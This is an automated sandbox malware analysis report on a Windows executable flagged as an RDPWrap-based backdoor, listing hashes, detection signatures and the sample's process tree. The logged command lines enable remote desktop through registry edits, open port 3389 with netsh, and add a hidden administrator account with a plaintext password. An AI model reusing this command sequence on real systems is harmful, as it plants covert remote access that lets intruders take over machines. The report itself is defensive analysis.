Edit tour
Windows
Analysis Report
67065b4c84713_Javiles.exe
Overview
General Information
| Sample name: | 67065b4c84713_Javiles.exe |
| Analysis ID: | 1531874 |
| MD5: | 8be8e5e57fc2a177c12ac52d6f71157c |
| SHA1: | 6d53911869b932db7dcbc5e9fb0c023fe3d520ad |
| SHA256: | f1417213f43cad96ecab7f83251b963706b22e4ebe4e6b34080fc6227ee359b3 |
| Tags: | exeuser-aachum |
| Infos: |   |
 | |
Detection
RDPWrap Tool
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Sigma detected: Suspicious Add User to Remote Desktop Users Group
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Classification
- System is w10x64
67065b4c84713_Javiles.exe (PID: 7480 cmdline: "C:\Users\ user\Deskt op\67065b4 c84713_Jav iles.exe" MD5: 8BE8E5E57FC2A177C12AC52D6F71157C) 
cmd.exe (PID: 7652 cmdline: "cmd.exe" /c reg add "HKEY_LOC AL_MACHINE \SOFTWARE\ Microsoft\ Windows\Cu rrentVersi on\Policie s\System" /v "AllowR emoteRPC" /t REG_DWO RD /d 1 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 7692 cmdline:
reg add "H KEY_LOCAL_ MACHINE\SO FTWARE\Mic rosoft\Win dows\Curre ntVersion\ Policies\S ystem" /v "AllowRemo teRPC" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 7708 cmdline:
"cmd.exe" /c reg add "HKEY_LOC AL_MACHINE \SOFTWARE\ Microsoft\ Windows\Cu rrentVersi on\Policie s\System" /v "Disabl eRemoteDes ktop" /t R EG_DWORD / d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 7748 cmdline:
reg add "H KEY_LOCAL_ MACHINE\SO FTWARE\Mic rosoft\Win dows\Curre ntVersion\ Policies\S ystem" /v "DisableRe moteDeskto p" /t REG_ DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 7764 cmdline:
"cmd.exe" /c "C:\Use rs\user\Ap pData\Loca l\Temp\RDP WInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RDPWInst.exe (PID: 7812 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\RDPWIns t.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6) - netsh.exe (PID: 7924 cmdline:
netsh advf irewall fi rewall add rule name ="Remote D esktop" di r=in proto col=tcp lo calport=33 89 profile =any actio n=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - svchost.exe (PID: 7828 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -s TermSer vice MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - cmd.exe (PID: 7696 cmdline:
"cmd.exe" /c net use r JustonTh ompson G2y wh4BZ30yu /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7712 cmdline:
"cmd.exe" /c net loc algroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7828 cmdline:
"cmd.exe" /c net loc algroup "R emote Desk top Users" JustonTho mpson /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7940 cmdline:
"cmd.exe" /c netsh a dvfirewall firewall add rule n ame="RDP" dir=in act ion=allow protocol=t cp localpo rt=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 7788 cmdline:
netsh advf irewall fi rewall add rule name ="RDP" dir =in action =allow pro tocol=tcp localport= 3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - cmd.exe (PID: 396 cmdline:
"cmd.exe" /c net loc algroup "A dministrat ors" Justo nThompson /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rdpvideominiport.sys (PID: 4 cmdline:
MD5: 77FF15B9237D62A5CBC6C80E5B20A492)
- rdpdr.sys (PID: 4 cmdline:
MD5: 64991B36F0BD38026F7589572C98E3D6)
- tsusbhub.sys (PID: 4 cmdline:
MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security | ||
| JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security | ||
| Click to see the 3 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_RDPWrapTool | Yara detected RDPWrap Tool | Joe Security | ||
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |   |
|---|
| Source: | Author: Markus Neis: | ||
| Source: | Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Max Altgelt (Nextron Systems): | ||
| Source: | Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): | ||
| Source: | Author: vburov: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-11T23:07:44.257533+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 172.67.74.152 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Static PE information: | ||
| Source: | Directory created: | Jump to behavior | ||
| Source: | Directory created: | Jump to behavior | ||
| Source: | Directory created: | Jump to behavior | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||